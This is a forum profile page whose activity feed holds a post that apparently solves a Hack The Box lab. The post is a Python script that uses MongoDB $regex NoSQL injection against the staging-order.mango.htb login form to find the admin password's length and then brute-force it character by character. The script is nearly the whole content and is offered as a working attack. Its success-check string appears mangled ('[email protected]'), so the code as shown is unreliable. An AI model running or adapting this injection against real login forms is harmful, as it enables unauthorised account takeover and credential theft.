peterdjalaliev

About

Username
peterdjalaliev
Joined
Visits
171
Last Active
Roles
Member

Activity

  • SullyInATX

    Got it:

    import requests
    import urllib3
    import string
    import urllib
    urllib3.disable_warnings()
    username='admin'
    u='http://staging-order.mango.htb'
    password_len = 0
    print("searching length")
    while True:
    payload = {
    "username": username,
    "password[$regex]": ".{" + str(password_len) + "}",
    "login": "login"
    }
    print("trying length {0}".format(password_len))
    r = requests.post(u, payload)
    if '[email protected]' not in r.text:
    break
    password_len += 1
    password_len -= 1
    print(("password length: {0}".format(password_len)))
    password = ''
    while len(password) != password_len:
    for c in string.printable:
    if c not in ['*','+','.','?','|', '#', '&', '$']:
    payload = {
    "username": username,
    "password[$regex]": "^{0}{1}".format(password, c),
    "login": "login"
    }
    r = requests.post(u, payload)
    print("trying {0}".format(password+c))
    if '[email protected]' in r.text:
    password += c
    break
    print(("password = {0}".format(password)))

    January 15
Avatar

Howdy, Stranger!

Click here to create an account.